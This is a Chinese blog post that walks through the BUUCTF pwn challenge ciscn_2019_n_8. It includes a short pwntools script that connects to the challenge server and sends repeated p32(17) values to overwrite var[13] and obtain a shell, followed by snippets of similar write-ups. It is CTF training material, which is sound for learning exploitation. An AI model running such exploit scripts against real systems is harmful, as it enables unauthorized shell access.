buuctf ciscn_2019_n_8

最新推荐文章于 2024-07-05 00:19:02 发布
最新推荐文章于 2024-07-05 00:19:02 发布
阅读量276 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/carol2358/article/details/105532484
版权

ida:
在这里插入图片描述
直接有sh,只要让var[13]等于17就可以

exp:

from pwn import * 
from LibcSearcher import * 

context.os='linux' 
context.arch='i386' 
context.log_level='debug' 

ru=lambda x:io.recvuntil(x) 
rl=lambda :io.recvline() 
sla=lambda x,y:io.sendlineafter(x,y) 

io=remote('node3.buuoj.cn',29534) 
#elf=ELF('./')

#p=p32(17)*14
p = flat([17])*14
sla('name?\n',p)

io.interactive()
真岛忍
关注
buuctf——ciscn_2019_n_8
qq_41560595的博客
03-21 562
查看权限 开了好多权限 查看源代码 分析 观察,var数组是int类型,在内存中占了4个字节。输入一个字符串,令var[13]处的值是17,且这个值占4个字节,就能拿到shell。 var中每一个元素占4个字节,payload必须构造成"A"*13才能将前13个位置占满。第14个位置要求是4字节,就要用p64打包。 解题代码 from pwn import * #p=process("./ciscn") p=remote("node3.buuoj.cn",25337) payload=b'AAAA'*
初学pwn-BUUCTF(ciscn_2019_n_1)
天柱的博客
08-31 633
初学pwn-writeUp BUUCTF的第四道题,ciscn-2019_n_1。 首先还是链接远端查看一下。 这里提示让猜一个数字,然后他告诉我们,这个数字应该是11.28125。这就有点掩耳盗铃了呀,但是输入了11.28125,还是在说应该输入11.28125。可能是有点问题,ida打开查看一下。 可以看到主函数里,调用了三个函数,前两个都是set某个值,我们直接看func函数。 那这就很明显了,刚刚输入的值赋给了v1,但是这里是要让v2的值等于11.28125才可以。查看一下地址。 嗯,跟想象
buuctfciscn_2019_n_8
weixin_54452942的博客
04-12 525
两个方法解题
BUUCTF-PWN】9-ciscn_2019_n_8
最新发布
燕麦葡萄干的博客
07-05 327
4 + p32(17) #qword/IDA在32位里面是4个字节,在64位是/8个字节。不属于栈溢出,应该是比较简单的pwn,看懂代码逻辑+使用pwntools。32位,开启了Stack、NX、PIE保护。即当var数组的第十四个元素是17就可以。
BUUCTF - PWN】ciscn_2019_n_8
古月浪子的博客
03-27 1149
checksec一下,好叭全开 IDA打开看看,var是int数组,如果var[13]=0x11的话就能get flag from pwn import * from LibcSearcher import * context.os='linux' context.arch='i386' context.log_level='debug' sla=lambda x,y:io.sendlin...
[buuctf]ciscn_2019_n_8
逆向萌新的博客
06-19 455
[buuctf]ciscn_2019_n_8
Buuctf(pwn)ciscn_2019_n_8
半岛铁盒的博客
03-28 239
保护开的挺全; from pwn import* r=remote('node3.buuoj.cn',28155) payload = p32(17)*14 r.sendline(payload) r.interactive() 没利用漏洞,简单的输入满足条件就好了
BUUCTFciscn_2019_n_1 1
qq_41560595的博客
09-24 4386
这道题是栈溢出题型,又不同于一般的栈溢出,在此做个总结。 查看权限 拖入IDA,F5可用函数 解题思路:这道题的意思是输入字符串v1,判断v2。考虑输入长字符串覆盖到存储v2的内存空间,把v2的值改掉。 因此,覆盖0x30-0x4=44个字节给v1,另外4个字节给v2 由于v2数值在内存中以16进制存储,所以,找到11.28125的16进制值。 存在两个比较指令,双击进去。 0x41348000就是16进制的11.28125。 编写脚本 from pwn import * p=remote('
BUUCTF栈迁移ciscn_2019_es_2
Rt1Text的博客
04-09 1035
1.checksec+运行获取基本信息 32位+NX堆栈不可执行 2.常规IDA操作 1.main函数 并没有什么 2.int vul()函数 程序主体,信息很多 1.两次read都在往同一个地方s处读入数据 2.要读入0x30,但s大小只有0x28,如果有后门函数,直接常规栈溢出操作 但是shift+f12 这里仅仅是打印flag字符串,没有用 同时查看hack函数 system里面的参数不是bin_sh不能直接用,所以要修改system的参数 但是...
BUUCTF pwn ciscn_2019_n_8
菜的只能随便写写博客
02-03 2622
0x01 文件分析  文件很简单,32位,保护都开得差不多。   0x02 运行  输入并且回显。   0x03 IDA源码分析 int __cdecl main(int argc, const char **argv, const char **envp) { int v4; // [esp-14h] [ebp-20h] int v5; // [esp-10h] [ebp-1Ch] ...
BUUCTF ciscn_2019_n_8
红叶的博客
10-31 265
一道通过Checksec让没看源代码的你觉得难度很高的题。
[BUUCTF-pwn]——ciscn_2019_n_8
Y_peak的博客
02-10 2034
[BUUCTF-pwn]——ciscn_2019_n_8 题目地址:https://buuoj.cn/challenges#ciscn_2019_n_8 题目 上去checksec一下,吓一跳保护基本全开了。 在IDA中一看,开心了。如此简单 只需要v[13] ==17 就好。因为var是以字符串的形式输入的。所以exploit如下: exploit from pwn import * p = remote("node3.buuoj.cn",29772) p.sendline("aaaa"*13 +
BUUCTF Pwn ciscn_2019_n_8 1
MrTreebook的博客
12-05 913
ciscn_2019_n_8 11.题目下载地址2.checksec检查保护3.IDA分析4.exp 1.题目下载地址 点击下载题目 2.checksec检查保护 所有保护全开,现在也不知道有什么办法 试着运行一下,可能又是canary绕过 3.IDA分析 init(); puts("What's your name?"); __isoc99_scanf("%s", var, v4, v5); if ( *(_QWORD *)&var[13] ) { if ( *(_
BUUCTF-PWN-ciscn_2019_n_8
Henlenl的博客
05-18 227
文章目录查看文件信息IDA 分析exp 查看文件信息 checksec 一下,保护还开的挺满 canary(栈保护),nx(堆栈不可执行),PIE(地址随机化) IDA 分析 其实我们应该nc 连一下的查看远程程序运行情况 丢入 32位IDA分析一下 很显然 程序的意思就是让 var[13] == 17就能拿到shell了 exp from pwn import * r = remote('node3.buuoj.cn',27168) #r = process('./ciscn_2019_n_8')
ciscn_2019_n_8 buuctf
XDiku的博客
01-21 668
ciscn_2019_n_8
[BUUCTF] ciscn_2019_n_8
Lucien_Carr的博客
04-14 262
这道题非常简单(甚至比ret2text简单...),只需要满足让系统调用system函数的条件,即将var[13]这个数组里全部填上17即可。checksec --file='filename' # filename为下载文件的自定义名称。观察选择条件,只需要满足var[13] = 17就可以。前面有scanf函数,可以直接向var数组输入。开了canary、NX和PIE,似乎防得很严实。主函数里就调用了system函数,运气很好。32位程序,放到IDA中继续分析。攻击成功,运行结果如下。
ciscn_2019_n_8【BUUCTF
qq_41696518的博客
08-26 357
ciscn_2019_n_8
ciscn_2019_n_8
m0sway的博客
03-16 684
Buu PWN ciscn_2019_n_8 详解writeup
buuctf luky_guy
09-28
Luky库是一组抽象复杂操作的Java类,它提供了各种功能,包括网络...根据提供的引用内容,无法直接了解到buuctf luky_guy的具体信息。如果您能提供更多关于buuctf luky_guy的背景信息,我可以尝试为您提供更准确的答案。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值